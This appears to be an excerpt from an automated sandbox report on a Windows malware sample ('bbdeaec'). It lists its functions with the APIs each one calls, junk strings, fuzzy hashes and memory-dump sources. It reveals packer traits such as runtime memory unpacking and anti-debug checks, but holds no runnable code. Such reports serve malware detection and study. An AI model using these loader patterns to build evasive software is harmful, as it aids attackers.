Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3B526874A11229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14

Function 004171E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
libraryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(00419374), ref: 00417212
MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
InterlockedDecrement.KERNEL32(?), ref: 0041726A

Strings

}$, xrefs: 00417271
k`, xrefs: 0041724D

Memory Dump Source

Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd

Similarity

API ID: DecrementFileInterlockedLibraryLoadMove
String ID: k`$}$
API String ID: 418655872-956986773
Opcode ID: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
Opcode Fuzzy Hash: 055f0f7ffecc5e23c9486112f5e49b18cc2ee72d9957fe011b2854fbba01f6c3
Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

Function 00416BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00512CE8), ref: 00416CAF
GetProcAddress.KERNEL32(00000000,0041D210), ref: 00416CEC
VirtualProtect.KERNELBASE(00512B2C,00512CE4,00000040,?), ref: 00416D0B

Strings

, xrefs: 00416C15

Memory Dump Source

Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
Instruction ID: d8462089c25fc9d344aee2fc6fb1be1e63980dafba0cd980b71d8e6a5f25c2b5
Opcode Fuzzy Hash: 43fa53ae4941edb72a049257c50d8535ae3816ba3e3ed060ecaf81b53e097827
Instruction Fuzzy Hash: C331285095C380D9E301CBB8FC047853F61AB39708F04C1A89658873B5D7BE9A69D7AE

Function 006B08C0 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006B08E8
Module32First.KERNEL32(00000000,00000224), ref: 006B0908

Memory Dump Source

Source File: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6ad000_bbdeaec.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 17c882ec551cdb7da65128ccd59f0b6069963c607a43712cc5b5f13b9c0995f9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 85F0C2726003146FF7203AB4988CBEF7AE9AF48364F101229E646911C0DA70E9854B60

Function 005A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005A0223,?,?), ref: 005A0E19
SetErrorMode.KERNELBASE(00000000,?,?,005A0223,?,?), ref: 005A0E1E

Memory Dump Source

Source File: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5a0000_bbdeaec.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ce7575169f36a7c85206fcae42e0fcb861aa2e687c756cbd9285e154151780ed
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 18D0123114512877DB002A94DC09BCD7F1CDF09B62F008411FB0DD9080C770994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 006B057F Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006B05D0

Memory Dump Source

Source File: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6ad000_bbdeaec.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 7803fdbe979b4cb0d16eaad0a0a003873bfc5bdaa5bb528a97cf3b6bd0f47886
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 89113C79A40208EFDB01DF98C985E99BFF5AF08350F158094F9489B362E371EA90DF84

Function 00416BA0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,00512CE4,004171C7), ref: 00416BA8

Memory Dump Source

Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
Instruction ID: 615a9cd2e73dd742d4f8b12f5f73b1ecb849c910c1908f7c89a030002a05c084
Opcode Fuzzy Hash: e1827eadc6904b053cd6145474e92f434bb3982baf1d8af9391b437b8e0fcf11
Instruction Fuzzy Hash: A7B092B0144200ABD3418FB0AD44B943BA4E318302F028115F600811A0CA201818AF14

Non-executed Functions

Function 00416E20 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
HeapDestroy.KERNEL32(00000000), ref: 00416E8E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D

Memory Dump Source

Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
Instruction ID: 37e889f167100b587a02f92b955e498922163858d7d7aab38356b1d4f56091a8
Opcode Fuzzy Hash: 0558a7fda510a8728fa0bbbce70783a7ac2517ddce2569006a515f8f95c0a596
Instruction Fuzzy Hash: 3401D474640308ABC760EB64EC45BDA7BB8E71C319F01416AF70997290DE349D88CBA9

Analysis Process: bbdeaecPID: 2364, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.4%
Total number of Nodes:	1395
Total number of Limit Nodes:	0

Executed Functions

Function 00401734 Relevance: 21.1, APIs: 14, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fast_error_exit.LIBCMT ref: 0040177F
__mtinit.LIBCMT ref: 00401785
_fast_error_exit.LIBCMT ref: 00401790
__RTC_Initialize.LIBCMT ref: 00401796
__ioinit.LIBCMT ref: 0040179E
__amsg_exit.LIBCMT ref: 004017A9
GetCommandLineW.KERNEL32 ref: 004017AF
__wsetargv.LIBCMT ref: 004017C3
__amsg_exit.LIBCMT ref: 004017CE
__wsetenvp.LIBCMT ref: 004017D4
__amsg_exit.LIBCMT ref: 004017DF
__cinit.LIBCMT ref: 004017E6
__amsg_exit.LIBCMT ref: 004017F1
__wwincmdln.LIBCMT ref: 004017F7

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
String ID:
API String ID: 2477803136-0
Opcode ID: 0b3215090b5a139c10ed41b0ee74db8f531c051cf043a2e305257fb1d2e2915d
Instruction ID: 6fdcb214c9b2331671cb2b23f299cc0ec8d03c5248dcf150cf5efc5892775ec8
Opcode Fuzzy Hash: 0b3215090b5a139c10ed41b0ee74db8f531c051cf043a2e305257fb1d2e2915d
Instruction Fuzzy Hash: 262190B0D003059AEB147BB3A886BAE3264AF0074CF14443FF545BB5E2EABC8981975C

Function 0040299C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004029B1

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 25d361b09e957743b43b72790dab211c9d62290dab0b0874eedda8804c941646
Instruction ID: 3a72839581f0c50a84aadab3f374704c1ec627b182d416cdb63d0e5fb33497ee
Opcode Fuzzy Hash: 25d361b09e957743b43b72790dab211c9d62290dab0b0874eedda8804c941646
Instruction Fuzzy Hash: 94D05EB2A943095ADB005F757C097A63BEC9388395F10C43ABD0CC61D0F674D540DA08

Non-executed Functions

Function 00416EC0 Relevance: 80.8, APIs: 40, Strings: 6, Instructions: 299
windowtimefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00416F22
WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00416F6D
DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00416FB7
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
GetFocus.USER32 ref: 00416FE0
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
FindAtomW.KERNEL32(00000000), ref: 00416FF4
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
_memset.LIBCMT ref: 00417012
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
GetEnvironmentStringsW.KERNEL32 ref: 00417048
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
ReleaseMutex.KERNEL32(00000000), ref: 004170CA
SetCommState.KERNEL32(00000000,00000000), ref: 004170F4
GetLastError.KERNEL32 ref: 004170F6
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
GetComputerNameW.KERNEL32(?,?), ref: 00417139
GetFileAttributesA.KERNEL32(00000000), ref: 00417140
GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
GetBinaryTypeA.KERNEL32(sutelizunosisibure,?), ref: 00417158
FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
GetLongPathNameW.KERNEL32(tekeragej,?,00000000), ref: 0041717E
GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
_calloc.LIBCMT ref: 0041718E
_realloc.LIBCMT ref: 00417195
_malloc.LIBCMT ref: 0041719B
_calloc.LIBCMT ref: 004171A2
_calloc.LIBCMT ref: 004171AE
_malloc.LIBCMT ref: 004171B4
LoadLibraryW.KERNEL32(gavosebisiv), ref: 00417212

Strings

}$, xrefs: 00417271
gavosebisiv, xrefs: 0041720D
k`, xrefs: 0041724D
sutelizunosisibure, xrefs: 00417153
tekeragej, xrefs: 00417179
wumefalijocenor, xrefs: 004172A2

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: Console$CommFileName_calloc$LengthOutputReadVolume_malloc$AdjustmentAlarmAliasAliasesAtomAttributeAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultDeleteEnvironmentErrorExchangeExesFindFocusFormatInformationInterlockedLastLibraryLoadLongMessageModeModuleMountMutexObjectPathPipePointPrivilegeReleaseStateStringsSystemTimeTimeoutsTypeWrite_memset_realloc
String ID: gavosebisiv$k`$sutelizunosisibure$tekeragej$wumefalijocenor$}$
API String ID: 2926064888-770840792
Opcode ID: 616efd3cad4b6969d08ec2e2054b1f30d9626ef2968c098a09980378875153e8
Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
Opcode Fuzzy Hash: 616efd3cad4b6969d08ec2e2054b1f30d9626ef2968c098a09980378875153e8
Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401947
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040195C
UnhandledExceptionFilter.KERNEL32(00418210), ref: 00401967
GetCurrentProcess.KERNEL32(C0000409), ref: 00401983
TerminateProcess.KERNEL32(00000000), ref: 0040198A

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: cab977522a7cec1a9ad2ed6b08adc5fb97aced058459959993d08fc7a1069c4d
Instruction ID: 67dfbe7b305ea0036175b21bacd2baea1b229a86cd233420b047d7cbc26f8ff8
Opcode Fuzzy Hash: cab977522a7cec1a9ad2ed6b08adc5fb97aced058459959993d08fc7a1069c4d
Instruction Fuzzy Hash: 3121A8B4980306DFC701EF68ECC4A843BE0FB08356F10C17AE528932A1E7B45A858F9D

Function 004171E6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 68
librarymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(gavosebisiv), ref: 00417212
LocalAlloc.KERNEL32(00000000,00000000), ref: 0041723D
GetStdHandle.KERNEL32(00000000), ref: 00417241
MoveFileA.KERNEL32(00000000,00000000), ref: 00417247
InterlockedDecrement.KERNEL32(?), ref: 0041726A
GetFileAttributesW.KERNEL32(wumefalijocenor), ref: 004172A7

Strings

}$, xrefs: 00417271
gavosebisiv, xrefs: 0041720D
k`, xrefs: 0041724D
wumefalijocenor, xrefs: 004172A2

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: File$AllocAttributesDecrementHandleInterlockedLibraryLoadLocalMove
String ID: gavosebisiv$k`$wumefalijocenor$}$
API String ID: 1531786347-1394638211
Opcode ID: f6b0d768e54f3586a25f5644e230000ed906063f711a6d0ff0fff656b7445972
Instruction ID: bc3d966121456f33088ba0261fb492972a46eee307fae20126fe30775f8c93fb
Opcode Fuzzy Hash: f6b0d768e54f3586a25f5644e230000ed906063f711a6d0ff0fff656b7445972
Instruction Fuzzy Hash: 862123349482148BCB349B60DC467DABB70FB58315F1244AFEA4997290CA3C5CD98799

Function 004053E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 004053F0

Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A

__amsg_exit.LIBCMT ref: 00405410
__lock.LIBCMT ref: 00405420
InterlockedDecrement.KERNEL32(?), ref: 0040543D
InterlockedIncrement.KERNEL32(005D2AE0), ref: 00405468

Strings

*], xrefs: 00405456, 0040545E

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: *]
API String ID: 4271482742-2659218941
Opcode ID: be58af24912cd6c62917008193cc0147a3d24d1c6f0f0b7415779849656b3a0e
Instruction ID: 70f83e997a8f96629d46cfa3be9f97651ca90acd5da0dd3ef1863481fd68f2a0
Opcode Fuzzy Hash: be58af24912cd6c62917008193cc0147a3d24d1c6f0f0b7415779849656b3a0e
Instruction Fuzzy Hash: 5B017C31900A21A7C720AF2598057DB77A4EB04752F15803BE810B36D1CB3CA981CFDD

Function 00403235 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00403253

Part of subcall function 00401CB7: __mtinitlocknum.LIBCMT ref: 00401CCD
Part of subcall function 00401CB7: __amsg_exit.LIBCMT ref: 00401CD9
Part of subcall function 00401CB7: EnterCriticalSection.KERNEL32(?,?,?,00401A9E,00000004,004194B8,0000000C,00401029,?,?,00000000), ref: 00401CE1

___sbh_find_block.LIBCMT ref: 0040325E
___sbh_free_block.LIBCMT ref: 0040326D
HeapFree.KERNEL32(00000000,?,004194F8,0000000C,0040357B,00000000,?,0040485B,?,00000001,?,?,00401C41,00000018,004194D8,0000000C), ref: 0040329D
GetLastError.KERNEL32(?,0040485B,?,00000001,?,?,00401C41,00000018,004194D8,0000000C,00401CD2,?,?,?,00401A9E,00000004), ref: 004032AE

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 366d77674f76aa2fb5ae094a41afa686f242d560b984fb5c48cef40d5ec03190
Instruction ID: 3d99899fb7fca7c9bbd17d8fbefa29218a77877265686fb0b1ca7e502e1f4026
Opcode Fuzzy Hash: 366d77674f76aa2fb5ae094a41afa686f242d560b984fb5c48cef40d5ec03190
Instruction Fuzzy Hash: 2101A771945305AADB206F72AC0AB9E7F68AF01319F20417FF404B71D0DB3C8644DA5C

Function 00407E9D Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00407ED1
__isleadbyte_l.LIBCMT ref: 00407F05
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00407F36
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00407FA4

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: e2cc34738d9ced17f9a8eed5ebd4bff17b00d4116af52a48d61af0889a0423cf
Instruction ID: 14c4ee2ed5b55191a4487f164104f5e3dea6c597eb3c288a55b3f11bb562f33e
Opcode Fuzzy Hash: e2cc34738d9ced17f9a8eed5ebd4bff17b00d4116af52a48d61af0889a0423cf
Instruction Fuzzy Hash: C331E431E09246EFCB20DF64C8809AE3BA5BF01311F1445BAE465AB2D1D734ED41DB9A

Function 00416E20 Relevance: 6.0, APIs: 4, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416E54
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00416E6F
HeapDestroy.KERNEL32(00000000), ref: 00416E8E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00416E9D

Memory Dump Source

Source File: 0000000D.00000002.4133901142.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.4133808349.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135215804.0000000000418000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135264462.000000000041B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.4135356644.0000000000517000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_bbdeaec.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
